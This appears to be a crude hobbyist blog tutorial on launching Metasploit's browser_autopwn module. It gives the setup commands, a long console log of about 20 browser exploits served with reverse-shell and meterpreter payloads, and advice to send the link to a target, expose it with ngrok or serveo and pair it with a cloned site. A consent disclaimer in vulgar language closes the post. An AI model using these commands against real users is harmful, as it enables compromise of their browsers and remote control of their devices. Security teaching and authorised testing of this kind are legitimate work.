sup lads laughing man here with a new tutorial on browser auto pwn in metasploit in this i will be using it on my lan network so
( Two use over wan open the ports in the router Find out more here
What is metasploit browser autopwn
Browser Autopwn is the easiest and quickest way to explicitly test browser vulnerabilities without having the user to painfully learn everything there is about each exploit and the remote target before deployment.
Using metasploit browser autopwn
Open terminal and type service postgresql start
then type msfconsole
Now we type use auxiliary/server/browser_autopwn show option set LHOST (YOUR IP HERE ) set SRVHOST (YOUR IP HERE) set SRVPORT (THE PORT YOUR USING) set URIPATH /
now we type run and with for the exploit start
msf5 auxiliary(server/browser_autopwn) > run
[*] Auxiliary module running as background job 0.
[*] Setup
msf5 auxiliary(server/browser_autopwn) >
[*] Starting exploit modules on host 192.168.178.26...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://192.168.178.26:443/CbJWUVzMR
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.178.26:443/DqTqhCBaEPSa
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.178.26:443/DGwrALc
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.178.26:443/xzHXGUWFlDfy
[*] Server started.
[*] 192.168.178.26 webview_addjavascriptinterface - Gathering target information for 192.168.178.26
[*] 192.168.178.26 webview_addjavascriptinterface - Sending HTML response to 192.168.178.26
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.178.26:443/BCImvD
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.178.26:443/cnZHbyGNFmT
[*] Server started.
[*] Using URL: http://192.168.178.26:443/yRAxXpJ
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] 192.168.178.26 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.178.26 java_atomicreferencearray - Generated jar to drop (5311 bytes).
[*] Using URL: http://192.168.178.26:443/VxeKgAsOGPF
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.178.26:443/MHqxKbqjVt
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.178.26:443/IPKTxmbm
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.178.26:443/JBloagFX
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.178.26:443/KRVwqDjLMEeQ
[*] Server started.
[*] Using URL: http://192.168.178.26:443/scRTnFkDUjvG
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.178.26:443/kzhaCMu
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.178.26:443/jXgssuao
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.178.26:443/hMyilS
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.178.26:443/bAfLxIr
[*] Server started.
[*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.178.26:443/QgLTKNtvoU
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.178.26:443/vNujDdB
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 192.168.178.26:3333
[*] Using URL: http://192.168.178.26:443/pJYNdh
[*] Server started.
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 192.168.178.26:6666
[*] Started reverse TCP handler on 192.168.178.26:7777
[*] --- Done, found 20 exploit modules
[*] Using URL: http://192.168.178.26:443/
now we send one the link to the target depending on there system as you can see there one for android to windows this.
my thoughts on browser autopwn
this a fast way to get a payload on the targets device as i use this a lot with beef-xss clone and site use ngrok or serveo to open the ports and a way you go. my next post will be on browser autopwn2 in metasploit as this method is old autopwn 2 is the new one
DISCLAMER
This tutorial is for learn not for you to go out and hack people as it agen the law and unmoral we do not support you hacking some one with out permissions so make sure u got owners consent before performing the attack with out this can lead to a prison term were you will get raped up the arse by a guy named bob as hacking is classed as a act of cyber terrorism no matter how funny it may be. in other words dont be a fucking wanker and respect other people's privacy as they respect yours
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.